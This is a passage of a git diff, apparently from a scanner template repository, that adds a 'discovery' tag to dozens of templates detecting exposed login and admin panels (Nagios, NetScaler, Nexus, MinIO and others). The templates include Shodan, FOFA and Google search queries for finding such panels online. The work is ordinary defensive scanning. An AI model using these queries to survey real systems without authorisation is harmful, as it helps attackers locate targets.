intitle:"minio browser" - intitle:"minio console" - tags: panel,minio + tags: panel,minio,discovery http: - method: GET diff --git a/http/exposed-panels/minio-console.yaml b/http/exposed-panels/minio-console.yaml index aa8a4f8495d..78dab4b24d9 100644 --- a/http/exposed-panels/minio-console.yaml +++ b/http/exposed-panels/minio-console.yaml @@ -15,7 +15,7 @@ info: fofa-query: app="MinIO-Console" product: console vendor: minio - tags: panel,minio + tags: panel,minio,discovery http: - method: GET diff --git a/http/exposed-panels/misp-panel.yaml b/http/exposed-panels/misp-panel.yaml index 16c9e7be19c..09237c28738 100644 --- a/http/exposed-panels/misp-panel.yaml +++ b/http/exposed-panels/misp-panel.yaml @@ -22,7 +22,7 @@ info: - title="errors - misp" - icon_hash="-137577333" google-query: intitle:"users - misp" - tags: panel,misp + tags: panel,misp,discovery http: - method: GET diff --git a/http/exposed-panels/mitel-micollab-panel.yaml b/http/exposed-panels/mitel-micollab-panel.yaml index 607a076d52e..38721c27cd3 100644 --- a/http/exposed-panels/mitel-micollab-panel.yaml +++ b/http/exposed-panels/mitel-micollab-panel.yaml @@ -21,7 +21,7 @@ info: fofa-query: - '"MiCollab End User Portal" && title=="Redirecting..."' - icon_hash="-1922044295" - tags: panel,mitel,login,detect + tags: panel,mitel,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/mitel-nupoint-panel.yaml b/http/exposed-panels/mitel-nupoint-panel.yaml index 4d44e3c34bf..f2303bd5e8e 100644 --- a/http/exposed-panels/mitel-nupoint-panel.yaml +++ b/http/exposed-panels/mitel-nupoint-panel.yaml @@ -20,7 +20,7 @@ info: - '"micollab end user portal" && title=="redirecting..."' - body="micollab end user portal" - icon_hash="-1922044295" - tags: panel,mitel,nupoint-unified-messaging,detect + tags: panel,mitel,nupoint-unified-messaging,detect,discovery http: - method: GET diff --git a/http/exposed-panels/mitel-panel-detect.yaml b/http/exposed-panels/mitel-panel-detect.yaml index a0b484af4ed..22ae6028048 100644 --- a/http/exposed-panels/mitel-panel-detect.yaml +++ b/http/exposed-panels/mitel-panel-detect.yaml @@ -18,7 +18,7 @@ info: - http.html:"Mitel Networks" - http.html:"mitel networks" fofa-query: body="mitel networks" - tags: panel,mitel + tags: panel,mitel,discovery http: - method: GET diff --git a/http/exposed-panels/mitric-checker-panel.yaml b/http/exposed-panels/mitric-checker-panel.yaml index c2212c0229a..65522f751c1 100644 --- a/http/exposed-panels/mitric-checker-panel.yaml +++ b/http/exposed-panels/mitric-checker-panel.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 2 - tags: panel,mitric,login,detect + tags: panel,mitric,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/mobile-management-panel.yaml b/http/exposed-panels/mobile-management-panel.yaml index 6bd29ad6410..ca8378cc776 100644 --- a/http/exposed-panels/mobile-management-panel.yaml +++ b/http/exposed-panels/mobile-management-panel.yaml @@ -15,7 +15,7 @@ info: fofa-query: title="移动管理平台-企业管理" product: manageengine_mobile_device_manager_plus vendor: zohocorp - tags: panel,mobile,management + tags: panel,mobile,management,discovery http: - method: GET diff --git a/http/exposed-panels/mobileiron-login.yaml b/http/exposed-panels/mobileiron-login.yaml index de9f80a7e45..ee02c3d098b 100644 --- a/http/exposed-panels/mobileiron-login.yaml +++ b/http/exposed-panels/mobileiron-login.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 3 - tags: panel,mobileiron + tags: panel,mobileiron,discovery http: - method: GET diff --git a/http/exposed-panels/mobileiron-sentry.yaml b/http/exposed-panels/mobileiron-sentry.yaml index c879b8d104c..da2fc5798ed 100644 --- a/http/exposed-panels/mobileiron-sentry.yaml +++ b/http/exposed-panels/mobileiron-sentry.yaml @@ -15,7 +15,7 @@ info: vendor: mobileiron product: sentry shodan-query: http.favicon.hash:967636089 - tags: panel,mobileiron + tags: panel,mobileiron,discovery http: - method: GET diff --git a/http/exposed-panels/modoboa-panel.yaml b/http/exposed-panels/modoboa-panel.yaml index d5ec0e14ae3..69c90274697 100644 --- a/http/exposed-panels/modoboa-panel.yaml +++ b/http/exposed-panels/modoboa-panel.yaml @@ -23,7 +23,7 @@ info: fofa-query: - body="modoboa" - icon_hash=1949005079 - tags: panel,modoboa,mail + tags: panel,modoboa,mail,discovery http: - method: GET diff --git a/http/exposed-panels/molgenis-panel.yaml b/http/exposed-panels/molgenis-panel.yaml index 2f6a58617f8..ba455d54fe5 100644 --- a/http/exposed-panels/molgenis-panel.yaml +++ b/http/exposed-panels/molgenis-panel.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: html:"MOLGENIS" - tags: panel,molgenis,login,emx2 + tags: panel,molgenis,login,emx2,discovery http: - method: GET diff --git a/http/exposed-panels/mongodb-ops-manager.yaml b/http/exposed-panels/mongodb-ops-manager.yaml index f223c7c343b..c7f6e207638 100644 --- a/http/exposed-panels/mongodb-ops-manager.yaml +++ b/http/exposed-panels/mongodb-ops-manager.yaml @@ -14,7 +14,7 @@ info: shodan-query: http.title:"MongoDB Ops Manager" product: ops_manager_server vendor: mongodb - tags: panel,mongodb + tags: panel,mongodb,discovery http: - method: GET diff --git a/http/exposed-panels/monitorix-exposure.yaml b/http/exposed-panels/monitorix-exposure.yaml index 22d0650115d..bc04207c1be 100644 --- a/http/exposed-panels/monitorix-exposure.yaml +++ b/http/exposed-panels/monitorix-exposure.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: monitorix,exposure,logs,panel + tags: monitorix,exposure,logs,panel,discovery http: - method: GET diff --git a/http/exposed-panels/monitorr-panel.yaml b/http/exposed-panels/monitorr-panel.yaml index dbd00027be0..a9f8560209a 100644 --- a/http/exposed-panels/monitorr-panel.yaml +++ b/http/exposed-panels/monitorr-panel.yaml @@ -13,7 +13,7 @@ info: product: monitorr shodan-query: http.favicon.hash:-211006074 fofa-query: icon_hash="-211006074" - tags: panel,monitorr,detect + tags: panel,monitorr,detect,discovery http: - method: GET diff --git a/http/exposed-panels/monstra-admin-panel.yaml b/http/exposed-panels/monstra-admin-panel.yaml index 0e798580ba0..3973b1da623 100644 --- a/http/exposed-panels/monstra-admin-panel.yaml +++ b/http/exposed-panels/monstra-admin-panel.yaml @@ -18,7 +18,7 @@ info: product: monstra_cms shodan-query: http.favicon.hash:419828698 fofa-query: icon_hash=419828698 - tags: panel,monstra + tags: panel,monstra,discovery http: - method: GET diff --git a/http/exposed-panels/moodle-workplace-panel.yaml b/http/exposed-panels/moodle-workplace-panel.yaml index 1551a429d46..3a8ba774991 100644 --- a/http/exposed-panels/moodle-workplace-panel.yaml +++ b/http/exposed-panels/moodle-workplace-panel.yaml @@ -16,7 +16,7 @@ info: vendor: moodle product: moodle shodan-query: http.html:"moodle" - tags: panel,moodle,login,detect + tags: panel,moodle,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/motive-eim-panel.yaml b/http/exposed-panels/motive-eim-panel.yaml index 44b910cfeb7..eabd89b0a98 100644 --- a/http/exposed-panels/motive-eim-panel.yaml +++ b/http/exposed-panels/motive-eim-panel.yaml @@ -21,7 +21,7 @@ info: - inurl:"bulk-profile-operation" - inurl:"eid-management" - inurl:"eid-management-new" - tags: panel,motive,eim,esim,iot + tags: panel,motive,eim,esim,iot,discovery http: - method: GET diff --git a/http/exposed-panels/movable-type-login.yaml b/http/exposed-panels/movable-type-login.yaml index fe0748b929b..4108110f454 100644 --- a/http/exposed-panels/movable-type-login.yaml +++ b/http/exposed-panels/movable-type-login.yaml @@ -19,7 +19,7 @@ info: - http.title:"サインイン | movable type pro" fofa-query: title="サインイン | movable type pro" google-query: intitle:"サインイン | movable type pro" - tags: panel,movable,sixapart + tags: panel,movable,sixapart,discovery http: - method: GET diff --git a/http/exposed-panels/mpftvc-admin-panel.yaml b/http/exposed-panels/mpftvc-admin-panel.yaml index 9ec48c49cc4..ee82ff15c63 100644 --- a/http/exposed-panels/mpftvc-admin-panel.yaml +++ b/http/exposed-panels/mpftvc-admin-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"AdminLogin - MPFTVC" - tags: panel,mpftvc,admin + tags: panel,mpftvc,admin,discovery http: - method: GET diff --git a/http/exposed-panels/mpsec-isg1000-panel.yaml b/http/exposed-panels/mpsec-isg1000-panel.yaml index 754135de1fc..6a759578136 100644 --- a/http/exposed-panels/mpsec-isg1000-panel.yaml +++ b/http/exposed-panels/mpsec-isg1000-panel.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 fofa-query: 迈普通信技术股份有限公司 - tags: panel,login,mpsec,isg1000 + tags: panel,login,mpsec,isg1000,discovery http: - method: GET diff --git a/http/exposed-panels/ms-adcs-detect.yaml b/http/exposed-panels/ms-adcs-detect.yaml index fef82cd76e6..bf42b922437 100644 --- a/http/exposed-panels/ms-adcs-detect.yaml +++ b/http/exposed-panels/ms-adcs-detect.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: microsoft,ad,panel + tags: microsoft,ad,panel,discovery http: - method: GET diff --git a/http/exposed-panels/ms-exchange-web-service.yaml b/http/exposed-panels/ms-exchange-web-service.yaml index 286d7f7a75c..4c75055207d 100644 --- a/http/exposed-panels/ms-exchange-web-service.yaml +++ b/http/exposed-panels/ms-exchange-web-service.yaml @@ -24,7 +24,7 @@ info: - icon_hash=1768726119 - title="outlook" google-query: intitle:"outlook" - tags: ms,microsoft,exchange,tech,panel + tags: ms,microsoft,exchange,tech,panel,discovery http: - method: GET diff --git a/http/exposed-panels/mspcontrol-login.yaml b/http/exposed-panels/mspcontrol-login.yaml index fe67ab632e6..e620b5e185c 100644 --- a/http/exposed-panels/mspcontrol-login.yaml +++ b/http/exposed-panels/mspcontrol-login.yaml @@ -15,7 +15,7 @@ info: max-request: 1 shodan-query: http.title:"MSPControl - Sign In" google-query: intitle:"MSPControl - Sign In" - tags: panel,mspcontrol + tags: panel,mspcontrol,discovery http: - method: GET diff --git a/http/exposed-panels/mybb-forum-detect.yaml b/http/exposed-panels/mybb-forum-detect.yaml index 6516e2b6db4..ffc90f7a66c 100644 --- a/http/exposed-panels/mybb-forum-detect.yaml +++ b/http/exposed-panels/mybb-forum-detect.yaml @@ -19,7 +19,7 @@ info: - http.title:"mybb" fofa-query: title="mybb" google-query: intitle:"mybb" - tags: panel,mybb,forum + tags: panel,mybb,forum,discovery http: - method: GET diff --git a/http/exposed-panels/mybb/mybb-forum-install.yaml b/http/exposed-panels/mybb/mybb-forum-install.yaml index 542df0160e0..aafc68d6b4e 100644 --- a/http/exposed-panels/mybb/mybb-forum-install.yaml +++ b/http/exposed-panels/mybb/mybb-forum-install.yaml @@ -20,7 +20,7 @@ info: - http.title:"mybb" fofa-query: title="mybb" google-query: intitle:"mybb" - tags: panel,mybb,forum + tags: panel,mybb,forum,discovery http: - method: GET diff --git a/http/exposed-panels/mylittleadmin-panel.yaml b/http/exposed-panels/mylittleadmin-panel.yaml index 6e8f85d1c90..a088863590c 100644 --- a/http/exposed-panels/mylittleadmin-panel.yaml +++ b/http/exposed-panels/mylittleadmin-panel.yaml @@ -18,7 +18,7 @@ info: shodan-query: http.html:"myLittleAdmin" product: mylittleadmin vendor: mylittletools - tags: panel,mylittleadmin,login + tags: panel,mylittleadmin,login,discovery http: - method: GET diff --git a/http/exposed-panels/mylittlebackup-panel.yaml b/http/exposed-panels/mylittlebackup-panel.yaml index f4a2d55fb4d..34e2dc9622e 100644 --- a/http/exposed-panels/mylittlebackup-panel.yaml +++ b/http/exposed-panels/mylittlebackup-panel.yaml @@ -18,7 +18,7 @@ info: shodan-query: http.html:"myLittleBackup" product: mylittlebackup vendor: mylittletools - tags: panel,mylittlebackup + tags: panel,mylittlebackup,discovery http: - method: GET diff --git a/http/exposed-panels/myq-panel.yaml b/http/exposed-panels/myq-panel.yaml index 59ad71f232d..8f9d310c6fa 100644 --- a/http/exposed-panels/myq-panel.yaml +++ b/http/exposed-panels/myq-panel.yaml @@ -20,7 +20,7 @@ info: - icon_hash="-2012429205" - icon_hash="-924708843" - title="MyQ" - tags: panel,myq,detect + tags: panel,myq,detect,discovery http: - method: GET diff --git a/http/exposed-panels/mystrom-panel.yaml b/http/exposed-panels/mystrom-panel.yaml index 08d55b20532..cc70ae0e830 100644 --- a/http/exposed-panels/mystrom-panel.yaml +++ b/http/exposed-panels/mystrom-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"myStrom" - tags: panel,mystrom,iot + tags: panel,mystrom,iot,discovery http: - method: GET diff --git a/http/exposed-panels/n8n-panel.yaml b/http/exposed-panels/n8n-panel.yaml index 48215659f2a..c0962cce966 100644 --- a/http/exposed-panels/n8n-panel.yaml +++ b/http/exposed-panels/n8n-panel.yaml @@ -16,7 +16,7 @@ info: vendor: n8n product: n8n shodan-query: http.favicon.hash:-831756631 - tags: panel,n8n,login,detect + tags: panel,n8n,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/nagios-panel.yaml b/http/exposed-panels/nagios-panel.yaml index 745b68d7c37..2fe08746782 100644 --- a/http/exposed-panels/nagios-panel.yaml +++ b/http/exposed-panels/nagios-panel.yaml @@ -17,7 +17,7 @@ info: shodan-query: http.title:"nagios" fofa-query: title="nagios" google-query: intitle:"nagios" - tags: panel,nagios + tags: panel,nagios,discovery http: - method: GET diff --git a/http/exposed-panels/nagios-xi-panel.yaml b/http/exposed-panels/nagios-xi-panel.yaml index ca1b695692f..ce6a04f8abb 100644 --- a/http/exposed-panels/nagios-xi-panel.yaml +++ b/http/exposed-panels/nagios-xi-panel.yaml @@ -21,7 +21,7 @@ info: - title="nagios xi" - app="nagios-xi" google-query: intitle:"nagios xi" - tags: panel,nagios,nagios-xi + tags: panel,nagios,nagios-xi,discovery http: - method: GET diff --git a/http/exposed-panels/nagios/nagios-logserver-panel.yaml b/http/exposed-panels/nagios/nagios-logserver-panel.yaml index 8c40e2ffc00..750ce0362ab 100644 --- a/http/exposed-panels/nagios/nagios-logserver-panel.yaml +++ b/http/exposed-panels/nagios/nagios-logserver-panel.yaml @@ -11,7 +11,7 @@ info: max-request: 1 fofa-query: icon_hash="1460499495" shodan-query: http.favicon.hash:1460499495 - tags: panel,nagios,nagios-logserver,login,detect + tags: panel,nagios,nagios-logserver,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/nagvis-panel.yaml b/http/exposed-panels/nagvis-panel.yaml index 2cae04531a7..6d3989f819f 100644 --- a/http/exposed-panels/nagvis-panel.yaml +++ b/http/exposed-panels/nagvis-panel.yaml @@ -18,7 +18,7 @@ info: - http.html:"NagVis" - http.html:"nagvis" fofa-query: body="nagvis" - tags: panel,nagvis + tags: panel,nagvis,discovery http: - method: GET diff --git a/http/exposed-panels/national-instruments/ni-web-based-panel.yaml b/http/exposed-panels/national-instruments/ni-web-based-panel.yaml index 3854433b7c0..86a2221f825 100644 --- a/http/exposed-panels/national-instruments/ni-web-based-panel.yaml +++ b/http/exposed-panels/national-instruments/ni-web-based-panel.yaml @@ -10,7 +10,7 @@ info: shodan-query: - title:"NI Web-based Configuration & Monitoring" - http.favicon.hash:1192389544 - tags: detect,ni,web-based,panel + tags: detect,ni,web-based,panel,discovery http: - method: GET diff --git a/http/exposed-panels/navicat-server-panel.yaml b/http/exposed-panels/navicat-server-panel.yaml index 0406d86da05..b4b09f475e1 100644 --- a/http/exposed-panels/navicat-server-panel.yaml +++ b/http/exposed-panels/navicat-server-panel.yaml @@ -11,7 +11,7 @@ info: max-request: 2 shodan-query: http.favicon.hash:598296063 fofa-query: icon_hash="598296063" - tags: panel,navicat,on-prem,detect + tags: panel,navicat,on-prem,detect,discovery http: - method: GET diff --git a/http/exposed-panels/ncentral-panel.yaml b/http/exposed-panels/ncentral-panel.yaml index 4fddcb4c077..36672ec6e1c 100644 --- a/http/exposed-panels/ncentral-panel.yaml +++ b/http/exposed-panels/ncentral-panel.yaml @@ -24,7 +24,7 @@ info: - "Set-Cookie: ncentral_version=" product: n-central vendor: n-able - tags: panel,n-central + tags: panel,n-central,discovery http: - method: GET diff --git a/http/exposed-panels/nconf-panel.yaml b/http/exposed-panels/nconf-panel.yaml index 5443e631a23..c1b99f0f9c2 100644 --- a/http/exposed-panels/nconf-panel.yaml +++ b/http/exposed-panels/nconf-panel.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.title:"nconf" product: nconf vendor: nconf_project - tags: panel,nconf + tags: panel,nconf,discovery http: - method: GET diff --git a/http/exposed-panels/neo4j-browser.yaml b/http/exposed-panels/neo4j-browser.yaml index 408e94b6acb..271adcf08ac 100644 --- a/http/exposed-panels/neo4j-browser.yaml +++ b/http/exposed-panels/neo4j-browser.yaml @@ -18,7 +18,7 @@ info: - http.title:"neo4j browser" fofa-query: title="neo4j browser" google-query: intitle:"neo4j browser" - tags: neo4j,exposure,unauth,panel + tags: neo4j,exposure,unauth,panel,discovery http: - method: GET diff --git a/http/exposed-panels/neobox-panel.yaml b/http/exposed-panels/neobox-panel.yaml index c8b3d5f411f..f409a648484 100644 --- a/http/exposed-panels/neobox-panel.yaml +++ b/http/exposed-panels/neobox-panel.yaml @@ -13,7 +13,7 @@ info: max-request: 1 shodan-query: http.html:"NeoboxUI" fofa-query: app="neobox-Web-Server" - tags: panel,neobox,webserver + tags: panel,neobox,webserver,discovery http: - method: GET diff --git a/http/exposed-panels/neocase-hrportal-panel.yaml b/http/exposed-panels/neocase-hrportal-panel.yaml index e6b94428eef..550604b70ea 100644 --- a/http/exposed-panels/neocase-hrportal-panel.yaml +++ b/http/exposed-panels/neocase-hrportal-panel.yaml @@ -1,5 +1,5 @@ -id: neocase-hrportal-panel - +id: neocase-hrportal-panel + info: name: Neocase HR Portal Login Panel - Detect author: righettod @@ -12,24 +12,24 @@ info: metadata: verified: true max-request: 1 - tags: panel,neocase,login,detect + tags: panel,neocase,login,detect,discovery -http: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains(to_lower(body), "neocase") && contains(to_lower(body), "hr portal") && contains(to_lower(body), "login")' - condition: and - - extractors: - - type: regex - part: body - group: 1 - regex: +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(to_lower(body), "neocase") && contains(to_lower(body), "hr portal") && contains(to_lower(body), "login")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: - 'name="version"\s+content="([0-9\.]+)"' # digest: 4b0a004830460221009fe54785febd3cbc23d604214e40e661512de7c21ac3c10d7712d63b7ffafe5f022100e14c0a0d022534b7fa1a6e6a4b7e122608d330b6691ceb3115c9275129a3958f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/neos-panel.yaml b/http/exposed-panels/neos-panel.yaml index ffb745ec192..3710b914da5 100644 --- a/http/exposed-panels/neos-panel.yaml +++ b/http/exposed-panels/neos-panel.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,neos,cms,login + tags: panel,neos,cms,login,discovery http: - method: GET diff --git a/http/exposed-panels/nessus-panel.yaml b/http/exposed-panels/nessus-panel.yaml index 1d0e665b895..7b76a91de6e 100644 --- a/http/exposed-panels/nessus-panel.yaml +++ b/http/exposed-panels/nessus-panel.yaml @@ -19,7 +19,7 @@ info: - http.title:"nessus" fofa-query: title="nessus" google-query: intitle:"nessus" - tags: panel,nessus,tenable + tags: panel,nessus,tenable,discovery http: - method: GET diff --git a/http/exposed-panels/netalertx-panel.yaml b/http/exposed-panels/netalertx-panel.yaml index ad4488688c4..d0039a2caf4 100644 --- a/http/exposed-panels/netalertx-panel.yaml +++ b/http/exposed-panels/netalertx-panel.yaml @@ -14,7 +14,7 @@ info: vendor: jokob-sk product: netalertx fofa-query: "NetAlert X" - tags: panel,login,netalertx,detect + tags: panel,login,netalertx,detect,discovery http: - method: GET diff --git a/http/exposed-panels/netdata-dashboard-detected.yaml b/http/exposed-panels/netdata-dashboard-detected.yaml index 6adcdd4b500..b30fe74818d 100644 --- a/http/exposed-panels/netdata-dashboard-detected.yaml +++ b/http/exposed-panels/netdata-dashboard-detected.yaml @@ -19,7 +19,7 @@ info: - "server: netdata embedded http server" fofa-query: title="netdata dashboard" google-query: intitle:"netdata dashboard" - tags: netdata,panel,tech + tags: netdata,panel,tech,discovery http: - method: GET diff --git a/http/exposed-panels/netdata-panel.yaml b/http/exposed-panels/netdata-panel.yaml index 5e43a104116..e2ca44cd485 100644 --- a/http/exposed-panels/netdata-panel.yaml +++ b/http/exposed-panels/netdata-panel.yaml @@ -23,7 +23,7 @@ info: - "server: netdata embedded http server" fofa-query: title="netdata dashboard" google-query: intitle:"netdata dashboard" - tags: panel,netdata,login,dashboard + tags: panel,netdata,login,dashboard,discovery http: - method: GET diff --git a/http/exposed-panels/netflix-conductor-ui.yaml b/http/exposed-panels/netflix-conductor-ui.yaml index 635ab245b97..10c5271e350 100644 --- a/http/exposed-panels/netflix-conductor-ui.yaml +++ b/http/exposed-panels/netflix-conductor-ui.yaml @@ -18,7 +18,7 @@ info: - http.title:"conductor ui", http.title:"workflow ui" fofa-query: title="conductor ui", http.title:"workflow ui" google-query: intitle:"conductor ui", http.title:"workflow ui" - tags: webserver,netflix,conductor,panel + tags: webserver,netflix,conductor,panel,discovery http: - method: GET diff --git a/http/exposed-panels/netflow-analyzer-panel.yaml b/http/exposed-panels/netflow-analyzer-panel.yaml index 48051df9c98..e51b732bcc9 100644 --- a/http/exposed-panels/netflow-analyzer-panel.yaml +++ b/http/exposed-panels/netflow-analyzer-panel.yaml @@ -12,7 +12,7 @@ info: vendor: zohocorp product: manageengine_netflow_analyzer shodan-query: html:"Login - Netflow Analyzer" - tags: netflow,analyzer,panel,login + tags: netflow,analyzer,panel,login,discovery http: - raw: diff --git a/http/exposed-panels/netgear-version-detect.yaml b/http/exposed-panels/netgear-version-detect.yaml index e4b963c8d3d..91d44fdabf2 100644 --- a/http/exposed-panels/netgear-version-detect.yaml +++ b/http/exposed-panels/netgear-version-detect.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,router,netgear + tags: panel,router,netgear,discovery http: - method: GET diff --git a/http/exposed-panels/netis-router.yaml b/http/exposed-panels/netis-router.yaml index 66efa8af1f3..790f377f769 100644 --- a/http/exposed-panels/netis-router.yaml +++ b/http/exposed-panels/netis-router.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,login,netis,router + tags: panel,login,netis,router,discovery http: - method: GET diff --git a/http/exposed-panels/netlify-cms.yaml b/http/exposed-panels/netlify-cms.yaml index ca4091034b5..2619ec13def 100644 --- a/http/exposed-panels/netlify-cms.yaml +++ b/http/exposed-panels/netlify-cms.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,netlify + tags: panel,netlify,discovery http: - method: GET diff --git a/http/exposed-panels/netris-dashboard-panel.yaml b/http/exposed-panels/netris-dashboard-panel.yaml index 8b43388fb33..917b1abeff3 100644 --- a/http/exposed-panels/netris-dashboard-panel.yaml +++ b/http/exposed-panels/netris-dashboard-panel.yaml @@ -12,7 +12,7 @@ info: max-request: 1 shodan-query: http.title:"Netris Dashboard" verified: true - tags: panel,netris + tags: panel,netris,discovery http: - method: GET diff --git a/http/exposed-panels/netscaler-aaa-login.yaml b/http/exposed-panels/netscaler-aaa-login.yaml index 832ea112b69..f565495b2f9 100644 --- a/http/exposed-panels/netscaler-aaa-login.yaml +++ b/http/exposed-panels/netscaler-aaa-login.yaml @@ -15,7 +15,7 @@ info: max-request: 1 vendor: citrix product: netscaler - tags: panel,netscaler,login,edb,citrix,detect + tags: panel,netscaler,login,edb,citrix,detect,discovery http: - method: GET diff --git a/http/exposed-panels/netscaler-console-panel.yaml b/http/exposed-panels/netscaler-console-panel.yaml index 38bf89f9145..60f95c30ffa 100644 --- a/http/exposed-panels/netscaler-console-panel.yaml +++ b/http/exposed-panels/netscaler-console-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"NetScaler Console" - tags: netscaler,console,panel,login + tags: netscaler,console,panel,login,discovery http: - method: GET diff --git a/http/exposed-panels/netscaler-gateway.yaml b/http/exposed-panels/netscaler-gateway.yaml index 78a6d5f645c..b0ed7d72926 100644 --- a/http/exposed-panels/netscaler-gateway.yaml +++ b/http/exposed-panels/netscaler-gateway.yaml @@ -15,7 +15,7 @@ info: max-request: 1 vendor: citrix product: netscaler_gateway - tags: panel,netscaler,citrix + tags: panel,netscaler,citrix,discovery http: - method: GET diff --git a/http/exposed-panels/netsparker-panel.yaml b/http/exposed-panels/netsparker-panel.yaml index 2e44a17fa0a..649e3125fba 100644 --- a/http/exposed-panels/netsparker-panel.yaml +++ b/http/exposed-panels/netsparker-panel.yaml @@ -15,7 +15,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Sign in to Netsparker Enterprise" - tags: panel,netsparker + tags: panel,netsparker,discovery http: - method: GET diff --git a/http/exposed-panels/netsus-server-login.yaml b/http/exposed-panels/netsus-server-login.yaml index 6bb4a09d5e2..6bdf5f269e2 100644 --- a/http/exposed-panels/netsus-server-login.yaml +++ b/http/exposed-panels/netsus-server-login.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"NetSUS Server Login" - tags: panel,netsus,login + tags: panel,netsus,login,discovery http: - method: GET diff --git a/http/exposed-panels/nexpose-panel.yaml b/http/exposed-panels/nexpose-panel.yaml index a23772c9482..dbf8b3f6c11 100644 --- a/http/exposed-panels/nexpose-panel.yaml +++ b/http/exposed-panels/nexpose-panel.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-516760689 - tags: nexpose,panel,login,detect + tags: nexpose,panel,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/nextcloudpi-panel.yaml b/http/exposed-panels/nextcloudpi-panel.yaml index 8e2a398c3d1..88a70ee02c7 100644 --- a/http/exposed-panels/nextcloudpi-panel.yaml +++ b/http/exposed-panels/nextcloudpi-panel.yaml @@ -15,7 +15,7 @@ info: product: nextcloudpi shodan-query: title:"NextcloudPi" fofa-query: title="NextcloudPi" - tags: nextcloud,nextcloudpi,login,panel + tags: nextcloud,nextcloudpi,login,panel,discovery http: - method: GET diff --git a/http/exposed-panels/nexus-panel.yaml b/http/exposed-panels/nexus-panel.yaml index 1a3f8cdd623..2ec89469405 100644 --- a/http/exposed-panels/nexus-panel.yaml +++ b/http/exposed-panels/nexus-panel.yaml @@ -1,5 +1,5 @@ -id: nexus-panel - +id: nexus-panel + info: name: Nexus Login Panel - Detect author: righettod @@ -12,24 +12,24 @@ info: verified: true max-request: 1 shodan-query: http.title:"Sonatype Nexus Repository" - tags: panel,nexus,login,detect + tags: panel,nexus,login,detect,discovery -http: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains_any(to_lower(body), "sonatype nexus repository", "content=\"sonatype nexus repository", "nexus-coreui-bundle")' - condition: and - - extractors: - - type: regex - part: body - group: 1 - regex: +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "<title>sonatype nexus repository", "content=\"sonatype nexus repository", "nexus-coreui-bundle")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: - '_v=([0-9\.\-]+)' # digest: 4a0a004730450221009fb553559b4185ce7ca827a4e8592ed26ab5da6d8e92c32b97cca3fba5f472a9022059ae271684d2284567ac0c100a4b6f012c1fcd8d5a28ad7b254a548a812132e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/nginx-admin-panel.yaml b/http/exposed-panels/nginx-admin-panel.yaml index 5a678d0f667..e509849012d 100644 --- a/http/exposed-panels/nginx-admin-panel.yaml +++ b/http/exposed-panels/nginx-admin-panel.yaml @@ -14,7 +14,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"nginx admin manager" - tags: panel,nginx,admin + tags: panel,nginx,admin,discovery http: - method: GET diff --git a/http/exposed-panels/nginx-proxy-manager.yaml b/http/exposed-panels/nginx-proxy-manager.yaml index 58d10d20e9c..5b2417c0fff 100644 --- a/http/exposed-panels/nginx-proxy-manager.yaml +++ b/http/exposed-panels/nginx-proxy-manager.yaml @@ -14,7 +14,7 @@ info: shodan-query: http.title:"Nginx Proxy Manager" product: nginx_proxy_manager vendor: nginxproxymanager - tags: panel,nginx,proxy + tags: panel,nginx,proxy,discovery http: - method: GET diff --git a/http/exposed-panels/nginx-ui-dashboard.yaml b/http/exposed-panels/nginx-ui-dashboard.yaml index a14feafcabe..b270c2f9596 100644 --- a/http/exposed-panels/nginx-ui-dashboard.yaml +++ b/http/exposed-panels/nginx-ui-dashboard.yaml @@ -21,7 +21,7 @@ info: - cpe:"cpe:2.3:a:f5:nginx" fofa-query: title="nginx ui" google-query: intitle:"nginx ui" - tags: panel,nginx,exposure,f5 + tags: panel,nginx,exposure,f5,discovery http: - method: GET diff --git a/http/exposed-panels/ngsurvey-panel.yaml b/http/exposed-panels/ngsurvey-panel.yaml index 37e67339b2a..7e90b9b87c2 100644 --- a/http/exposed-panels/ngsurvey-panel.yaml +++ b/http/exposed-panels/ngsurvey-panel.yaml @@ -1,28 +1,28 @@ -id: ngsurvey-panel - -info: - name: ngSurvey Login Panel - Detect - author: righettod - severity: info - description: | - ngSurvey products was detected. - reference: - - https://www.ngsurvey.com/ - metadata: - max-request: 1 - verified: true - shodan-query: http.title:"ngSurvey enterprise survey software" - tags: panel,ngsurvey,login,detect - -http: - - method: GET - path: - - 